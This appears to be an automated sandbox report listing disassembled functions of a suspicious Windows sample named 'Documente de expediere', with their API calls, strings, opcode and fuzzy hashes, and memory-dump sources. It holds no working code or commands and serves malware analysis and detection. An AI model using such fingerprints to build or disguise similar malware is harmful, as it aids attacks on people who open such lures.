                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 659eec6fbcf988ea7bcd26654ab3bd5d75f31da23c1c3407c0811b6e81350bcc
                                                • Instruction ID: c949bd268189a3b5b39974a3709b11e65e328fc9210a588cc2e9613919395c18
                                                • Opcode Fuzzy Hash: 659eec6fbcf988ea7bcd26654ab3bd5d75f31da23c1c3407c0811b6e81350bcc
                                                • Instruction Fuzzy Hash: BBE01A75800204EFDF019FA8CC08ADD7BF6EB5C350F11C42AF95A972A0CB3881429F49
                                                Function 006D219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 006D219B
                                                • GetDC.USER32(00000000), ref: 006D21A5
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006D21B1
                                                • ReleaseDC.USER32(?), ref: 006D21D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 63229a29e2a81ee611745ba06e058d93603c3845b4485971a88fa1e9c9102748
                                                • Instruction ID: e6c475e29c75726cd00a057012da350ec933339166af5787fcbc05fede3afd6d
                                                • Opcode Fuzzy Hash: 63229a29e2a81ee611745ba06e058d93603c3845b4485971a88fa1e9c9102748
                                                • Instruction Fuzzy Hash: 44E0EEB5800204AFCF01AFA8C80869D7BB6EB4C360F11C029F95AA72A0CB3891429F48
                                                Function 006963A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %r
                                                • API String ID: 0-2999538795
                                                • Opcode ID: 0805423f0d59dbafd4ed1a7ae80c9d134ba28ffb2ce90554f52cad143bb66f7e
                                                • Instruction ID: 6f9c018a34fed3c6a4dcdace3cb5d67f94e258b5671f0e0e26b5a899e091f229
                                                • Opcode Fuzzy Hash: 0805423f0d59dbafd4ed1a7ae80c9d134ba28ffb2ce90554f52cad143bb66f7e
                                                • Instruction Fuzzy Hash: BAB1A1719002099BCF14EF98C4819FEB7BEFF44310F50812AF902A7A95DB359E86CB65
                                                Function 0070B1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __itow_s
                                                • String ID: xru$xru
                                                • API String ID: 3653519197-2112298241
                                                • Opcode ID: 86c2cda687b7fad5def6396454a43804652e7205ebb8a1885a47fc6ef631c914
                                                • Instruction ID: 48c5604472903c2e0260573637442726f99e33c1c92ccd872c86f92b0ceff7a6
                                                • Opcode Fuzzy Hash: 86c2cda687b7fad5def6396454a43804652e7205ebb8a1885a47fc6ef631c914
                                                • Instruction Fuzzy Hash: D0B16D70A00209EFCB14DF54C880EAEB7FAFF58300F148659F9459B292EB75EA41CB64
                                                Function 006FB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006AFEC6: _wcscpy.LIBCMT ref: 006AFEE9
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • __wcsnicmp.LIBCMT ref: 006FB298
                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 006FB361
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                • String ID: LPT
                                                • API String ID: 3222508074-1350329615
                                                • Opcode ID: 7cc4c502d1d0edb94e66a73adce204a00d5b854ca527f23d1104c5fcd13c2df5
                                                • Instruction ID: e0a83c7d87e3159a451f4313ccf052950affb1b3710830a1321750eb9d7d05f5
                                                • Opcode Fuzzy Hash: 7cc4c502d1d0edb94e66a73adce204a00d5b854ca527f23d1104c5fcd13c2df5
                                                • Instruction Fuzzy Hash: 0E616176A00219AFCB14EB98C881EFEB7BAAF08310F15505DF546AB391DB70AE41CB55
                                                Function 006D8A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: Oaj
                                                • API String ID: 4104443479-1426506063
                                                • Opcode ID: e25d1d63914e36d6523bcbe38dae89e4fe877d3bb12b76798303c8d92ec3af8b
                                                • Instruction ID: 3fcf890b70298ed304ef1b5721bbca2c87fedd3d141c8a0080148951f138f1c0
                                                • Opcode Fuzzy Hash: e25d1d63914e36d6523bcbe38dae89e4fe877d3bb12b76798303c8d92ec3af8b
                                                • Instruction Fuzzy Hash: B2515DB0E006199FDB64DF68C884AEEB7B2FF45304F14852AE85AD7340EB31A955CB51
                                                Function 006A2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 006A2AC8
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 006A2AE1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: 31a08223093864b7b03acddeae44fdede1f5e221924ae7a76849dfd0a8525dcf
                                                • Instruction ID: 34cde37dc15619052a2a75b3d4f7bf0b4581bb7ecdc1cb942764e7f5a123a421
                                                • Opcode Fuzzy Hash: 31a08223093864b7b03acddeae44fdede1f5e221924ae7a76849dfd0a8525dcf
                                                • Instruction Fuzzy Hash: E65157714187449BE360AF14D886BAFBBFCFF84310F42885DF1E9411A1EB349529CB2A
                                                Function 006F99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0069506B: __fread_nolock.LIBCMT ref: 00695089
                                                • _wcscmp.LIBCMT ref: 006F9AAE
                                                • _wcscmp.LIBCMT ref: 006F9AC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscmp$__fread_nolock
                                                • String ID: FILE
                                                • API String ID: 4029003684-3121273764
                                                • Opcode ID: b02b7c822275a89291731221cf260463b46d2cc4e2c0d33317f456b53e39dab2
                                                • Instruction ID: b65b348dd45e78a28326efd398252b42121acd1bd11641a7a107a2db9e019aa9
                                                • Opcode Fuzzy Hash: b02b7c822275a89291731221cf260463b46d2cc4e2c0d33317f456b53e39dab2
                                                • Instruction Fuzzy Hash: A341D6B1A00619BADF219AA0DC45FEFB7BEDF45710F00007DBA01A7281DA759A4587A5
                                                Function 006D099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID: Dtu$Dtu
                                                • API String ID: 1473721057-3210119752
                                                • Opcode ID: 23c1456607ad53ecbc3556452efe5f757ec78be6bdac68c715a6faf17bcb2aec
                                                • Instruction ID: f7b704b3de456003995eb882558380dba0ab52373af750e221f476e1618ca79e
                                                • Opcode Fuzzy Hash: 23c1456607ad53ecbc3556452efe5f757ec78be6bdac68c715a6faf17bcb2aec
                                                • Instruction Fuzzy Hash: 21510674A08341CFDB54CF59C080A6ABBF6BB99344F54885DF8858B721D772EC81CB82
                                                Function 00702882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 00702892
                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007028C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CrackInternet_memset
                                                • String ID: |
                                                • API String ID: 1413715105-2343686810
                                                • Opcode ID: 108f15285473c3ee2635f180fda927a2b9170ae0dcdb4f47247f3017fb415cee
                                                • Instruction ID: 4bb9fb8f8625c16b0f08b853172b2a15917e9bd4f0b9eb27f92b038122d0f44e
                                                • Opcode Fuzzy Hash: 108f15285473c3ee2635f180fda927a2b9170ae0dcdb4f47247f3017fb415cee
                                                • Instruction Fuzzy Hash: E2314A71810119AFCF45EFA1CC89EEEBFB9FF08310F004129F815A61A6DB355A56DBA4
                                                Function 00716CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(?,?,?,?), ref: 00716D86
                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00716DC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$DestroyMove
                                                • String ID: static
                                                • API String ID: 2139405536-2160076837
                                                • Opcode ID: 3438f95f047b8d6bebe2f7b1a927be0027123fe08fdcc28b534c9749bbbf8396
                                                • Instruction ID: fd46f9fda1f11b379070353744bd061b219afebf89fd4fe864c68db5b26deefe
                                                • Opcode Fuzzy Hash: 3438f95f047b8d6bebe2f7b1a927be0027123fe08fdcc28b534c9749bbbf8396
                                                • Instruction Fuzzy Hash: B3319C71200604AEDF109F38DC81AFB77ADFF48720F10861DF8A997190DA39AC91CB64
                                                Function 006F2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 006F2E00
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006F2E3B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 3fd8545e350d7c3c3a761b147f4f9ec7cb02fb795fc31af8880422679badfe66
                                                • Instruction ID: f5cf89d0f16b46efa224a872a880d6f7b4bf18ce10bc5d56975d44c6a7fdbe03
                                                • Opcode Fuzzy Hash: 3fd8545e350d7c3c3a761b147f4f9ec7cb02fb795fc31af8880422679badfe66
                                                • Instruction Fuzzy Hash: 0031C57160030EABEB248F58C9957FEBBBBEF05350F24402EEA85962A1E7749944CF54
                                                Function 00716943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007169D0
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007169DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 2d4abdb773defc9e2b02b47c855a8be9ce1054ed2d04c27e521d09230c730fa6
                                                • Instruction ID: c33f8063a704384daa53b17f5fbd21cd4a8b6279f3ea51cad4ffe8f965d35d21
                                                • Opcode Fuzzy Hash: 2d4abdb773defc9e2b02b47c855a8be9ce1054ed2d04c27e521d09230c730fa6
                                                • Instruction Fuzzy Hash: DF1198717002096FEF119F18CC91EFB3B6EEB993A4F114129F9589B2D0D679EC9187A0
                                                Function 00716E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
                                                  • Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
                                                  • Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91
                                                • GetWindowRect.USER32(00000000,?), ref: 00716EE0
                                                • GetSysColor.USER32(00000012), ref: 00716EFA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                • Opcode ID: eda383d078d8abce99a0718bf49b528bb6e965102ab951e5fde5ea62f003b2df
                                                • Instruction ID: 330ba75720b93d4db4a92bdee87a165504a46fee09b3e396caa48dcd7baa16bf
                                                • Opcode Fuzzy Hash: eda383d078d8abce99a0718bf49b528bb6e965102ab951e5fde5ea62f003b2df
                                                • Instruction Fuzzy Hash: A921297261021AAFDB04DFA8DD45AEA7BB9FB08314F044629F955D3290E638E8A19B50
                                                Function 00716B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 00716C11
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00716C20
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: 39744fb2d0dac6c65be7c1e26db7301a57d22ff520070d60cdd7a4ec53857931
                                                • Instruction ID: 049c287e80a37ada2bf1a4e59772f1f015990c0fe30c79b0a676e211654654e6
                                                • Opcode Fuzzy Hash: 39744fb2d0dac6c65be7c1e26db7301a57d22ff520070d60cdd7a4ec53857931
                                                • Instruction Fuzzy Hash: 12119AB1104208ABEB208E689C41AEB376AEB05368F608724F960D71E0C679EC919B60
                                                Function 006F2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 006F2F11
                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006F2F30
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: ae6f603284d990690cb7374eb3b5ab91c078c1da7edd22dffe104e6feea3b9bc
                                                • Instruction ID: f9d22d64248c37b03bb45298f307d52e0033422b370dae971cd419cf7f29b8df
                                                • Opcode Fuzzy Hash: ae6f603284d990690cb7374eb3b5ab91c078c1da7edd22dffe104e6feea3b9bc
                                                • Instruction Fuzzy Hash: A911D03195221EABCB20DB58DD14BF977BBFB01310F1440A5EA54E73A0E7B0AD04CB95
                                                Function 007024CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00702520
                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00702549
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Internet$OpenOption
                                                • String ID: <local>
                                                • API String ID: 942729171-4266983199
                                                • Opcode ID: db0af2c811029dc427bb42d0313ff876959e5d1b86ebe8a57670fb75de938070
                                                • Instruction ID: 5883f34bc5f5a38d4ea651a9e54df6d5a76e88f63a30a4a587edbba53754867e
                                                • Opcode Fuzzy Hash: db0af2c811029dc427bb42d0313ff876959e5d1b86ebe8a57670fb75de938070
                                                • Instruction Fuzzy Hash: 8811E372100225FADB248F518C9DEFBFFA8FB05355F10826AF50542181D3785952D6E0
                                                Function 007080A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0070830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007080C8,?,00000000,?,?), ref: 00708322
                                                • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007080CB
                                                • htons.WSOCK32(00000000,?,00000000), ref: 00708108
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidehtonsinet_addr
                                                • String ID: 255.255.255.255
                                                • API String ID: 2496851823-2422070025
                                                • Opcode ID: 731c42dfa174f9321d3b3cb6eacc61ea37aa1ec01e42b6613c859ed91c695d2b
                                                • Instruction ID: 9e3df8aa3a003597109efde44d1fcb7f97cb279dadc322c482775502b50d32eb
                                                • Opcode Fuzzy Hash: 731c42dfa174f9321d3b3cb6eacc61ea37aa1ec01e42b6613c859ed91c695d2b
                                                • Instruction Fuzzy Hash: E811E534500309EBDB10AF68CC86FEDB365FF14320F10862AF951A72D2DB35A811C75A
                                                Function 006A0A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00693C26,007562F8,?,?,?), ref: 006A0ACE
